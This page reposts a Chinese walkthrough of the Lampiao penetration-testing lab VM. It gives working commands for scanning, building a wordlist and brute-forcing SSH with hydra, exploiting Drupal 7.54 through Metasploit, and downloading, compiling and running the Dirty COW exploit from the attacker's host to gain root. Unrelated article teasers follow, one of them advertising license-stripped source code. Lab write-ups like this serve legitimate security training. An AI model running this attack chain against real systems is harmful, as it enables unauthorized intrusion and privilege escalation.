【Lampiao靶场渗透】

news2024/11/27 16:27:41

文章目录

一、IP地址获取

二、信息收集

三、破解SSH密码

四、漏洞利用

五、提权


一、IP地址获取

netdiscover -i eth0 
Arp-scan -l 
Nmap -sP 192.168.78.0/24

靶机地址:192.168.78.177

Kali地址:192.168.78.128

二、信息收集

nmap  -sV  -p-  192.168.78.177

开放了 22 80 1898端口,访问80 web页面

访问1898端口

发现了登录框和网站框架信息drupal 7,随便点击一下页面发现还存在其他页面内容

http://192.168.78.177:1898/?q=node/2

提示了一个音频和图片文件

http://192.168.78.177:1898/audio.m4a
http://192.168.78.177:1898/qrc.png

音频得到提示user:tiago,图片二维码提示尝试爆破

再利用dirb探测一下其他目录

Dirb http://192.168.78.177:1898

看到了robots文件,访问一下

其中changelog.txt文件可看到框架版本Drupal 7.54

三、破解SSH密码

前面提示说需要爆破,猜测是需要构造密码字典爆破ssh密码

cewl http://192.168.78.177:1898/?q=node/1 -w password.txt
hydra -l tiago -P password.txt 192.168.78.177 -s 22 ssh 

最终得到账户密码:

用户: tiago

密码: Virgulino

ssh登录一下

发现是低权限用户!需要提权!

四、漏洞利用

通过前面我们知道网站框架是drupal 7.54,搜索exploite

searchsploit  drupal 7.54

发现msf中有,进入msf进行利用

msfdb init & msfconsole
search  Drupal
Use 1
set rport 1898
set rhosts 192.168.78.177
Set rport 6666
meterpreter > shell

交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

还是低权限用户,还需要考虑提权

五、提权

Uname -a 查看内核版本

Ubuntu 14.01,查阅资料可知可用脏牛漏洞提权

找到相关版本的exp

searchsploit dirty

locate linux/local/40847.cpp 查看绝对路径

将它复制到当前目录,并创建http服务,再靶机/tmp目录下使用wget下载

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root
python3 -m http.server 8000
wget http://192.168.78.128:8000/40847.cpp

编译运行脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yc 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o yc  gcc生成的目标文件,名字为yc
./yc  执行gcc编译可执行文件,可直接提权

su命令转到root身份,输入上面的密码:dirtyCowFun,即可提权成功


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1961869.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

实战:ElasticSearch 索引操作命令(补充)

四.ElasticSearch 操作命令 4.1 集群信息操作命令 4.1.1 查询集群状态 (1)使用 Postman 客户端直接向 ES 服务器发 GET 请求 http://hlink1:9200/_cat/health?v (2)使用服务端进行查询 curl -XGET "hlink1:9200/_cat/h…

装饰大师——装饰模式(Python实现)

大家好,今天我们继续来讲结构型设计模式,上一期我们介绍了组合模式,这个模式特别适合用于处理树形结构的问题,它能够让我们像处理单个对象一样来处理对象组合。 装饰模式(Decorator Pattern)是一种结构型设…

最新彩虹自助下单代发卡码知识付费商城多模板系统完整版去授权源码V6.9

最新彩虹的知识付费商城源码,后台可以选择多套模板,完整版去授权,支持对接多个资源网站,不怕无资源 推荐用宝塔上传后直接访问即可根据提示安装。 后面用户名/密码:admin/123456 PHP推荐使用7.0及以上版本 V6.9 1.修复SQL注入…

k8s 部署RuoYi-Vue-Plus之ingress域名解析

可参看https://blog.csdn.net/weimeibuqieryu/article/details/140798925 搭建ingress 1.创建Ingress对象 ingress-ruoyi.yaml其中host替换为你对应域名,需要解析域名到服务器, 同时为后端服务添加了二级域名解析 api. 访问http://xxx.xyz/就能访问前端&#xff0…

应急靶场(11):【玄机】日志分析-apache日志分析

题目 提交当天访问次数最多的IP,即黑客IP黑客使用的浏览器指纹是什么,提交指纹的md5查看index.php页面被访问的次数,提交次数查看黑客IP访问了多少次,提交次数查看2023年8月03日8时这一个小时内有多少IP访问,提交次数 …

【Redis 初阶】Redis 常见数据类型(Set、Zset、渐进式遍历、数据库管理)

一、Set 集合 集合类型也是保存多个字符串类型的元素的(可以使用 json 格式让 string 也能存储结构化数据),但和列表类型不同的是,集合中: 元素之间是无序的。(此处的 “无序” 是和 list 的有序相对应的…

重载云台摄像机如何通过国标28181接入到统一视频接入平台(视频国标接入平台)

目录 一、国标GB/T 28181介绍 1、国标GB/T28181 2、内容和特点 二、重载云台摄像机 1、定义 2、结构与设计 3、功能和优势 4、特点 5、应用场景 二、接入准备工作 1、确定网络环境 (1)公网接入 (2)专网传输 2、检查重…

软件测试基础1--功能测试

1、什么是软件测试? 软件是控制计算机硬件运行的工具。 软件测试:使用技术手段验证软件是否满足使用需求,为了发现软件功能和需求不相符合的地方,或者寻找实际输出和预期输出之间的差异。 软件测试的目的:减少软件缺陷…

golang JSON序列化

JSON JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。 易于人阅读和编写。同时也易于机器解析和生成。 它基于JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999的一个子集。 json历史 [外链图片转存失败,源站可能有防盗链机…

080基于ssm+vue的大学生兼职信息系统

开发语言:Java框架:ssmJDK版本:JDK1.8服务器:tomcat7数据库:mysql 5.7(一定要5.7版本)数据库工具:Navicat11开发软件:eclipse/myeclipse/ideaMaven包:Maven3.…

获客工具大揭秘:为何它能让获客如此轻松?

你是不是也觉得,现在的市场环境,获客越来越难了? 今天我要给大家分享一个实用且高效的获客工具,它简直是营销界的福音! 1、关键词搜索 关键词搜索功能是获客工具的基础,也是其重要性不可小觑的原因。 这…

【数据中台】大数据管理平台建设方案(原件资料)

建设大数据管理中台,按照统一的数据规范和标准体系,构建统一数据采集﹣治理﹣共享标准、统一技术开发体系、统一接口 API ,实现数据采集、平台治理,业务应用三层解耦,并按照统一标准格式提供高效的…

LabVIEW发电机控制器自动测试系统

随着飞机电源系统对自动化与精确控制需求的提高,开发了一套基于LabVIEW和NI PXI硬件平台的飞机发电机控制器测试系统。该系统利用先进的测试技术,实现对飞机发电机控制器的自动测试,显著提升测试的效率、精度和一致性。 项目背景 飞机发电机…

nginx反向代理+nginx黑白名单+nginx负载均衡+平滑升级+配置jdk环境-7.30

一、反向代理 1.前端服务器配置 前端服务器:用于接收和响应客户端,代理另一台主机 Nginx 安装 (1).下载安装nginx [rootweb ~]# wget https://nginx.org/download/nginx-1.26.1.tar.gz (2).解压 [rootweb ~ ]# tar -zxvf nginx-1.26.1.tar.gz (3…

《从零开始做个摸鱼小网站! · 序》灵感来源

序 大家好呀,我是summo,这次来写写我在上班空闲(摸鱼)的时候做的一个小网站的事。去年阿里云不是推出了个活动嘛,2核2G的云服务器一年只要99块钱,懂行的人应该知道这个价格在业界已经是非常良心了,虽然优惠只有一年&a…

【论文共读】【翻译】【CGAN】【Conditional Gernerative Adversarial Networks】

论文地址:https://arxiv.org/pdf/1411.1784 翻译: Conditional Gernerative Adversarial Networks 条件生成对抗网络 0. 摘要 生成对抗网络[8]最近被引入,作为一种训练生成模型的新方法。在这项工作中,我们引入了生成对抗网络的…

同步与异步,阻塞与非阻塞的深入分析

😎 作者介绍:欢迎来到我的主页👈,我是程序员行者孙,一个热爱分享技术的制能工人。计算机本硕,人工制能研究生。公众号:AI Sun(领取大厂面经等资料),欢迎加我的…

人在迷茫无聊时该干什么?

做两件事,收和放。 第一件事收,全面收缩。 迷茫不是无事可做,而是所做的事没有意义,没有意义就停掉,空出时间让身心恢复到正常状态。迷茫会让你焦虑,让你晚睡,让你狂吃,让你迫不及待…

公司里的IT是什么?

公司里的IT是什么? 文章目录 公司里的IT是什么?1、公司里的IT2、IT技术3、IT行业4、IT行业常见证书 如果对你有帮助,就点赞收藏把!(。・ω・。)ノ♡ 前段时间,在公…